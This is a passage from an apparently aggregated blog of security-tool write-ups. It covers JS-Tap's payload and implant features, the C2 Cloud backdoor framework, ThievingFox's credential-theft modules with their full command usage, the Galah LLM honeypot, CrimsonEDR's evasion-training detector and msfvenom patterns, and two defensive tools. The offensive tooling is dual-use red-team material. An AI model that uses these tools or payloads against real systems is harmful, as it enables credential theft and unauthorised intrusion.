        Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

        The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

        Custom Payloads

        Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

        [{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

        The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

        In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

        You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

        The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

        To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

        Tools

        A few tools are included in the tools subdirectory.

        clientSimulator.py

        A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

        At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.

        numClients = 50

        You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

        apiServer = "https://127.0.0.1:8444"

        JS-Tap run using gunicorn scales quite well.

        MonkeyPatchApp

        A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.

        Run with:

        python3 monkeyPatchLab.py

        By default this will start the application running on:

        https://127.0.0.1:8443

        Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

        function injectPayload()
        {
        document.head.appendChild(Object.assign(document.createElement('script'),
        {src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
        }

        formParser.py

        Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

        You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

        generateIntelReport.py

        No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.

        Contact

        @hoodoer
        hoodoer@bitwisemunitions.dev



        MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

        By: Zion3R


        What is MasterParser ?

        MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extract critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.


        MasterParser Wallpapers

        Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

        Supported Logs Format

        This is the list of supported log formats within the var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis. |Supported Log Formats List| | --- | | auth.log |

        Feature & Log Format Requests:

        If you wish to propose the addition of a new feature \ log format, kindly submit your request by creating an issue Click here to create a request

        How To Use ?

        How To Use - Text Guide

        1. From this GitHub repository press on "<> Code" and then press on "Download ZIP".
        2. From "MasterParser-main.zip" export the folder "MasterParser-main" to you Desktop.
        3. Open a PowerSehll terminal and navigate to the "MasterParser-main" folder.
        # How to navigate to "MasterParser-main" folder from the PS terminal
        PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
        1. Now you can execute the tool, for example see the tool command menu, do this:
        # How to show MasterParser menu
        PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
        1. To run the tool, put all your /var/log/* logs in to the 01-Logs folder, and execute the tool like this:
        # How to run MasterParser
        PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
        1. That's it, enjoy the tool!

        How To Use - Video Guide

        https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

        MasterParser Social Media Publications

        Social Media Posts
        1. First Tool Post
        2. First Tool Story Publication By Help Net Security
        3. Second Tool Story Publication By Forensic Focus
        4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


        C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

        By: Zion3R


        The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

        C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

        Reverse shells support:

        1. Reverse TCP
        2. Reverse HTTP
        3. Reverse HTTPS (configure it behind an LB)
        4. Telegram C2

        Demo

        C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
        Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
        Telegram C2: https://youtu.be/WLQtF4hbCKk

        Key Features

        πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
        πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
        πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
        πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

        Tech Stack

        πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
        πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
        🌐 Nginx: Effortlessly routing traffic between web and backend systems.
        πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
        πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
        πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

        Architecture

        Application setup

        • Management port: 9000
        • Reversse HTTP port: 8000
        • Reverse TCP port: 8888

        • Clone the repo

        • Optional: Update chait_id, bot_token in c2-telegram/config.yml
        • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

        Credits

        Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

        License

        Distributed under the MIT License. See LICENSE for more information.

        Contact



        ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

        By: Zion3R


        ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

        The accompanying blog post can be found here


        Installation

        Linux

        Rustup must be installed, follow the instructions available here : https://rustup.rs/

        The mingw-w64 package must be installed. On Debian, this can be done using :

        apt install mingw-w64

        Both x86 and x86_64 windows targets must be installed for Rust:

        rustup target add x86_64-pc-windows-gnu
        rustup target add i686-pc-windows-gnu

        Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

        After adding Mono repositories, Nuget can be installed using apt :

        apt install nuget

        Finally, python dependancies must be installed :

        pip install -r client/requirements.txt

        ThievingFox works with python >= 3.11.

        Windows

        Rustup must be installed, follow the instructions available here : https://rustup.rs/

        Both x86 and x86_64 windows targets must be installed for Rust:

        rustup target add x86_64-pc-windows-msvc
        rustup target add i686-pc-windows-msvc

        .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

        Finally, python dependancies must be installed :

        pip install -r client/requirements.txt

        ThievingFox works with python >= 3.11

        NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

        Targets

        All modules have been tested on the following Windows versions :

        Windows Version
        Windows Server 2022
        Windows Server 2019
        Windows Server 2016
        Windows Server 2012R2
        Windows 10
        Windows 11

        [!CAUTION] Modules have not been tested on other version, and are expected to not work.

        Application Injection Method
        KeePass.exe AppDomainManager Injection
        KeePassXC.exe DLL Proxying
        LogonUI.exe (Windows Login Screen) COM Hijacking
        consent.exe (Windows UAC Popup) COM Hijacking
        mstsc.exe (Windows default RDP client) COM Hijacking
        RDCMan.exe (Sysinternals' RDP client) COM Hijacking
        MobaXTerm.exe (3rd party RDP client) COM Hijacking

        Usage

        [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

        ThievingFox contains 3 main modules : poison, cleanup and collect.

        Poison

        For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

        To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

        --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

        --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

        The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

        Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

        [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

        $ python3 client/ThievingFox.py poison -h
        usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
        [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
        [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
        target

        positional arguments:
        target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

        options:
        -h, --help show this help message and exit
        -hashes HASHES, --hashes HASHES
        LM:NT hash
        -aesKey AESKEY, --aesKey AESKEY
        AES key to use for Kerberos Authentication
        -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
        -dc-ip DC_IP, --dc-ip DC_IP
        IP Address of the domain controller
        -no-pass, --no-pass Do not prompt for password
        --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
        --keepass Try to poison KeePass.exe
        --keepass-path KEEPASS_PATH
        The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
        --keepass-share KEEPASS_SHARE
        The share on which KeePass is installed (Default: c$)
        --keepassxc Try to poison KeePassXC.exe
        --keepassxc-path KEEPASSXC_PATH
        The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
        --ke epassxc-share KEEPASSXC_SHARE
        The share on which KeePassXC is installed (Default: c$)
        --mstsc Try to poison mstsc.exe
        --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
        logged in (Default: False)
        --consent Try to poison Consent.exe
        --logonui Try to poison LogonUI.exe
        --rdcman Try to poison RDCMan.exe
        --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
        logged in (Default: False)
        --mobaxterm Try to poison MobaXTerm.exe
        --mobaxterm-poison-hkcr
        Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
        logged in (Default: False)
        --all Try to poison all applications

        Cleanup

        For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

        For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

        Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

        It does not clean extracted credentials on the remote host.

        [!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

        $ python3 client/ThievingFox.py cleanup -h
        usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
        [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
        [--rdcman] [--mobaxterm] [--all]
        target

        positional arguments:
        target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

        options:
        -h, --help show this help message and exit
        -hashes HASHES, --hashes HASHES
        LM:NT hash
        -aesKey AESKEY, --aesKey AESKEY
        AES key to use for Kerberos Authentication
        -k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
        -dc-ip DC_IP, --dc-ip DC_IP
        IP Address of the domain controller
        -no-pass, --no-pass Do not prompt for password
        --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
        --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
        --keepass-share KEEPASS_SHARE
        The share on which KeePass is installed (Default: c$)
        --keepass-path KEEPASS_PATH
        The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
        --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
        --keepassxc-path KEEPASSXC_PATH
        The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
        --keepassxc-share KEEPASSXC_SHARE
        The share on which KeePassXC is installed (Default: c$)
        --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
        --consent Try to cleanup all poisonning artifacts related to Consent.exe
        --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
        --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
        --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
        --all Try to cleanup all poisonning artifacts related to all applications

        Collect

        For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

        Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

        $ python3 client/ThievingFox.py collect -h
        usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
        [--logonui] [--rdcman] [--mobaxterm] [--all]
        target

        positional arguments:
        target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

        options:
        -h, --help show this help message and exit
        -hashes HASHES, --hashes HASHES
        LM:NT hash
        -aesKey AESKEY, --aesKey AESKEY
        AES key to use for Kerberos Authentication
        -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
        -dc-ip DC_IP, --dc-ip DC_IP
        IP Address of th e domain controller
        -no-pass, --no-pass Do not prompt for password
        --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
        --keepass Collect KeePass.exe logs
        --keepassxc Collect KeePassXC.exe logs
        --mstsc Collect mstsc.exe logs
        --consent Collect Consent.exe logs
        --logonui Collect LogonUI.exe logs
        --rdcman Collect RDCMan.exe logs
        --mobaxterm Collect MobaXTerm.exe logs
        --all Collect logs from all applications


        Galah - An LLM-powered Web Honeypot Using The OpenAI API

        By: Zion3R


        TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


        Description

        Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

        I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

        The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

        Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

        Future Enhancements

        • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

        • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

        • Support for Other LLMs.

        Getting Started

        • Ensure you have Go version 1.20+ installed.
        • Create an OpenAI API key from here.
        • If you want to serve over HTTPS, generate TLS certificates.
        • Clone the repo and install the dependencies.
        • Update the config.yaml file.
        • Build and run the Go binary!
        % git clone git@github.com:0x4D31/galah.git
        % cd galah
        % go mod download
        % go build
        % ./galah -i en0 -v

        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
        β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        llm-based web honeypot // version 1.0
        author: Adel "0x4D31" Karimi

        2024/01/01 04:29:10 Starting HTTP server on port 8080
        2024/01/01 04:29:10 Starting HTTP server on port 8888
        2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
        2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

        2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
        2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
        2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
        2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

        ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
        2024/01/01 04:39:27 All servers shut down gracefully.

        Example Responses

        Here are some example responses:

        Example 1

        % curl http://localhost:8080/login.php
        <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

        JSON log record:

        {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

        Example 2

        % curl http://localhost:8080/.aws/credentials
        [default]
        aws_access_key_id = AKIAIOSFODNN7EXAMPLE
        aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
        region = us-west-2

        JSON log record:

        {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

        Okay, that was impressive!

        Example 3

        Now, let's do some sort of adversarial testing!

        % curl http://localhost:8888/are-you-a-honeypot
        No, I am a server.`

        JSON log record:

        {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

        πŸ˜‘

        % curl http://localhost:8888/i-mean-are-you-a-fake-server`
        No, I am not a fake server.

        JSON log record:

        {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

        You're a galah, mate!



        CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

        By: Zion3R


        CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


        Features

        Detection Description
        Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
        NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
        AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
        ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
        PE Stomping Identifies instances of PE (Portable Executable) stomping.
        Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
        Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
        Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
        API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
        Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

        Installation

        To get started with CrimsonEDR, follow these steps:

        1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
        2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
        3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

        ⚠️ Warning

        Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

        Usage

        To use CrimsonEDR, follow these steps:

        1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
        {
        "IOC": [
        ["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
        ["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
        ["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
        ["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
        ["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
        ["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
        ["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
        ["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
        ]
        }
        1. Execute CrimsonEDRPanel.exe with the following arguments:

          • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

          • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

        For example:

        .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

        Useful Links

        Here are some useful resources that helped in the development of this project:

        Contact

        For questions, feedback, or support, please reach out to me via:



        CSAF - Cyber Security Awareness Framework

        By: Zion3R

        The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


        Requirements

        Software

        • Docker
        • Docker-compose

        Hardware

        Minimum

        • 4 Core CPU
        • 10GB RAM
        • 60GB Disk free

        Recommendation

